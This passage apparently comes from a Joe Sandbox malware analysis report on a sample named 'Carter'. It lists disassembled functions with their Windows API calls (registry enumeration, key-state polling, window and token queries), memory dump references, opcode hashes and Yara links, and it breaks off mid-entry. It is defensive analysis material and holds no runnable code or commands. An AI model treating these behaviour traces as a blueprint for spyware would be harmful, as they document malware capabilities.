                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                        • String ID:
                                                                        • API String ID: 2364364464-0
                                                                        • Opcode ID: 20f3e46430f65e375e70e6dff2b60dc97024a4b20f54a5776a5b62f4ca1b2122
                                                                        • Instruction ID: e888764bf376631ce97ab9a3cf0bcbf75c6cbba6c9111059c76e9c24e3cf3254
                                                                        • Opcode Fuzzy Hash: 20f3e46430f65e375e70e6dff2b60dc97024a4b20f54a5776a5b62f4ca1b2122
                                                                        • Instruction Fuzzy Hash: 868194716007019FD760EF29DC46F2BB7E5AF44710F04895DFA99DB292DB74AC018B52
                                                                        Function 01060697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 0106147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0106040D,?,?), ref: 01061491
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0106075D
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0106079C
                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 010607E3
                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 0106080F
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0106081C
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                        • String ID:
                                                                        • API String ID: 3440857362-0
                                                                        • Opcode ID: cb2804ddcb74afb1210b0662a06fb57e3ac1f932ddccb19d9b09d174f51efcf0
                                                                        • Instruction ID: 6319efbe862791783eb7eab295b0b16fe30742334dc58854239d76a4c28da627
                                                                        • Opcode Fuzzy Hash: cb2804ddcb74afb1210b0662a06fb57e3ac1f932ddccb19d9b09d174f51efcf0
                                                                        • Instruction Fuzzy Hash: A3518A71608209AFD714EF68CC81E6EB7E9FF84314F00891DF695872A5DB39E905CB92
                                                                        Function 0104EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0104EC62
                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0104EC8B
                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0104ECCA
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0104ECEF
                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0104ECF7
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 1389676194-0
                                                                        • Opcode ID: 9b8520ce234abeba44c5870ed6a1752722135e38e258239a619ebd915f6dbaa0
                                                                        • Instruction ID: 618a15b9d976fb9adc09421e25d2ccab4a417dc38246deebddd2826d50507d17
                                                                        • Opcode Fuzzy Hash: 9b8520ce234abeba44c5870ed6a1752722135e38e258239a619ebd915f6dbaa0
                                                                        • Instruction Fuzzy Hash: 6C513975A00109DFDB11EF65C981AAEBBF5FF08314F1480A9E989AB3A1CB35ED01DB50
                                                                        Function 0106A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b5c3e88dc44253162c6a47934878b79273d42833d896547b2a2fdc280214adcd
                                                                        • Instruction ID: 3380efa55d66ff64c1695a48b32512947bbf7217d36cb9a5355d426aea1ea24b
                                                                        • Opcode Fuzzy Hash: b5c3e88dc44253162c6a47934878b79273d42833d896547b2a2fdc280214adcd
                                                                        • Instruction Fuzzy Hash: 1741C375A00114EFE760EA28CC84FA9BBFCFB0A310F054295FA97B72D1C679A941CB50
                                                                        Function 00FE2714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 00FE2727
                                                                        • ScreenToClient.USER32(010A77B0,?), ref: 00FE2744
                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00FE2769
                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00FE2777
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                        • String ID:
                                                                        • API String ID: 4210589936-0
                                                                        • Opcode ID: 3ff7275e8f1da99264d1bdc5bd03aed06de3df16b83a6ae61ded5b6223982e54
                                                                        • Instruction ID: 330ec26039eb794e8be024fa9edf1df00d597ba9378ed18942c2516d31480234
                                                                        • Opcode Fuzzy Hash: 3ff7275e8f1da99264d1bdc5bd03aed06de3df16b83a6ae61ded5b6223982e54
                                                                        • Instruction Fuzzy Hash: 8B41E471904109FFDF599F69C944EEDBBB8FB05330F108359F868A2294D735AA50DB90
                                                                        Function 010395D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 010395E8
                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 01039692
                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0103969A
                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 010396A8
                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 010396B0
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePostSleep$RectWindow
                                                                        • String ID:
                                                                        • API String ID: 3382505437-0
                                                                        • Opcode ID: 6aea77aab84051601d274a5b641345866b86349cd15205c5a97819bc063bf244
                                                                        • Instruction ID: efe6f894657ff734fd6c8bcf799fbd57c7c4e6b3e95af551bae4af9fa51bd43c
                                                                        • Opcode Fuzzy Hash: 6aea77aab84051601d274a5b641345866b86349cd15205c5a97819bc063bf244
                                                                        • Instruction Fuzzy Hash: 5D31FF31900219EFDF10CF68D94CA9E3BB9FB89329F104258F9A4EB2C5C3B09910DB90
                                                                        Function 0103BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 0103BD9D
                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0103BDBA
                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0103BDF2
                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0103BE18
                                                                        • _wcsstr.LIBCMT ref: 0103BE22
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                        • String ID:
                                                                        • API String ID: 3902887630-0
                                                                        • Opcode ID: 5b683edde84299b5fe3f5c874f1e4203e6f250739c31f0fe6749b4f0a7c724bd
                                                                        • Instruction ID: f1a017897b09ac01d012fe868cd357f234e017aa809c06f11e2d2b27998c7c30
                                                                        • Opcode Fuzzy Hash: 5b683edde84299b5fe3f5c874f1e4203e6f250739c31f0fe6749b4f0a7c724bd
                                                                        • Instruction Fuzzy Hash: B5210732604244BAFB26AB3DDC08E7F7BDDDF89760F108069F989DA185EB71C8008761
                                                                        Function 0106B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0106B804
                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0106B829
                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0106B841
                                                                        • GetSystemMetrics.USER32(00000004), ref: 0106B86A
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0105155C,00000000), ref: 0106B888
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$MetricsSystem
                                                                        • String ID:
                                                                        • API String ID: 2294984445-0
                                                                        • Opcode ID: 59376cb3b63e6f7e27bfae2e41f2ecf10caf41634b45abdd73c048c1a28216de
                                                                        • Instruction ID: ac8a72db9604a9c518b7bb6c96c041ac304cef4dd203f3f27674c48ec927e6b8
                                                                        • Opcode Fuzzy Hash: 59376cb3b63e6f7e27bfae2e41f2ecf10caf41634b45abdd73c048c1a28216de
                                                                        • Instruction Fuzzy Hash: 6D21A1B1A10215AFDB609E3CCC04B6A3BE8FB05720F244778FAA6D31D5E7358810CB90
                                                                        Function 01056138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsWindow.USER32(00000000), ref: 01056159
                                                                        • GetForegroundWindow.USER32 ref: 01056170
                                                                        • GetDC.USER32(00000000), ref: 010561AC
                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 010561B8
                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 010561F3
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ForegroundPixelRelease
                                                                        • String ID:
                                                                        • API String ID: 4156661090-0
                                                                        • Opcode ID: 63a432fd3ec4802353ff3cd0d4b39df615ba0e3c56f19d41f8f542981315a4aa
                                                                        • Instruction ID: bacb92bcdf8f19048c97b016a149564b99edc952288d07b3b6b204dcc3b920b0
                                                                        • Opcode Fuzzy Hash: 63a432fd3ec4802353ff3cd0d4b39df615ba0e3c56f19d41f8f542981315a4aa
                                                                        • Instruction Fuzzy Hash: 1821A175A00204AFD710EF65DC84AAABBF9EF89711F048479F98AD7256CA35AC40CB90
                                                                        Function 00FE16CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FE1729
                                                                        • SelectObject.GDI32(?,00000000), ref: 00FE1738
                                                                        • BeginPath.GDI32(?), ref: 00FE174F
                                                                        • SelectObject.GDI32(?,00000000), ref: 00FE1778
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                        • String ID:
                                                                        • API String ID: 3225163088-0
                                                                        • Opcode ID: c8da5cc1d594b80524875d8eaabde2bd299d85c12c501147a70773d7714518da
                                                                        • Instruction ID: d95b72d93314fb61b4f2dcc599b720c99f4820ffa0d54bc8dde99d333ddc9f45
                                                                        • Opcode Fuzzy Hash: c8da5cc1d594b80524875d8eaabde2bd299d85c12c501147a70773d7714518da
                                                                        • Instruction Fuzzy Hash: E221F531D00648EFDB219F26D8047693BF9F700721F648316F895A2198D37B9991DF90
                                                                        Function 0103C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memcmp
                                                                        • String ID:
                                                                        • API String ID: 2931989736-0
                                                                        • Opcode ID: 840530391b4da2c7aa8c567e08f157b0a9fd84cf6fa41779129f6e620712d78f
                                                                        • Instruction ID: 358c88aa0cbbe4e8cf3eae4c467bf1f51a14fa4968e34e09a7f1acd95527f9c6
                                                                        • Opcode Fuzzy Hash: 840530391b4da2c7aa8c567e08f157b0a9fd84cf6fa41779129f6e620712d78f
                                                                        • Instruction Fuzzy Hash: CF01B972B041097BF21567165E81FFB735CAEA5264F04402AFEC6EA742EB60DF1182E5
                                                                        Function 0104504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 01045075
                                                                        • __beginthreadex.LIBCMT ref: 01045093
                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 010450A8
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 010450BE
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 010450C5
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                        • String ID:
                                                                        • API String ID: 3824534824-0
                                                                        • Opcode ID: 2e8767b81e56030710cecf9292bb6b788093ab07b5777b3dfa6ba8f6505e9690
                                                                        • Instruction ID: 36f5ee39fc251d261e2f078e0bb0114c3a2c31cef0adc5b9189dadb7ea7cecb6
                                                                        • Opcode Fuzzy Hash: 2e8767b81e56030710cecf9292bb6b788093ab07b5777b3dfa6ba8f6505e9690
                                                                        • Instruction Fuzzy Hash: 6F1108B6904708BBD7618BA89C44A9B7FACEB85320F544369F994E3344D677890487F0
                                                                        Function 01038E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01038E3C
                                                                        • GetLastError.KERNEL32(?,01038900,?,?,?), ref: 01038E46
                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,01038900,?,?,?), ref: 01038E55
                                                                        • HeapAlloc.KERNEL32(00000000,?,01038900,?,?,?), ref: 01038E5C
                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01038E73
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 842720411-0
                                                                        • Opcode ID: a9b3ca13f9adec1f2cb4c74468240d8f6c4d92ddcb8153bd271bcd174a92de75
                                                                        • Instruction ID: daf40185fef961ce5f5de5979da9e0dca0aceadcb1525859e474946b31fd39b0
                                                                        • Opcode Fuzzy Hash: a9b3ca13f9adec1f2cb4c74468240d8f6c4d92ddcb8153bd271bcd174a92de75
                                                                        • Instruction Fuzzy Hash: 3F0112B1601304BFDB214FA9DC48D6B7FADEF8A75572046AAF989D2114D6769800CB70
                                                                        Function 010457FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0104581B
                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01045829
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 01045831
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0104583B
                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01045877
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                        • String ID:
                                                                        • API String ID: 2833360925-0
                                                                        • Opcode ID: 37d29efb73ba79a423ea229cd1245603992f0ae415ace29ac8bf38d678701955
                                                                        • Instruction ID: 58d593772451f26356d81a3ed895b533ae6f970a60b4c0f32120be447bfc8bb1
                                                                        • Opcode Fuzzy Hash: 37d29efb73ba79a423ea229cd1245603992f0ae415ace29ac8bf38d678701955
                                                                        • Instruction Fuzzy Hash: 4E015B71C016199BEF10AFE8EC889EDBBB8BB0D711F00416AE581B2148CF359550CBA1
                                                                        Function 01037D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01037C62,80070057,?,?,?,01038073), ref: 01037D45
                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01037C62,80070057,?,?), ref: 01037D60
                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01037C62,80070057,?,?), ref: 01037D6E
                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01037C62,80070057,?), ref: 01037D7E
                                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01037C62,80070057,?,?), ref: 01037D8A
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 3897988419-0
                                                                        • Opcode ID: e366a851b5a28bd2e8fb5cabbf17924506f8ad6370194602116e947cc57c67f5
                                                                        • Instruction ID: 8df54ef5afdef8a6b33a19e9741eccfa9895d8b5ed5ba201bb627588c0840e71
                                                                        • Opcode Fuzzy Hash: e366a851b5a28bd2e8fb5cabbf17924506f8ad6370194602116e947cc57c67f5
                                                                        • Instruction Fuzzy Hash: 7C0171B2A01204BBDB615F58DC48BAEBFFDEB85751F144154FA88E6208D776DD00CBA0
                                                                        Function 01038D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01038D3F
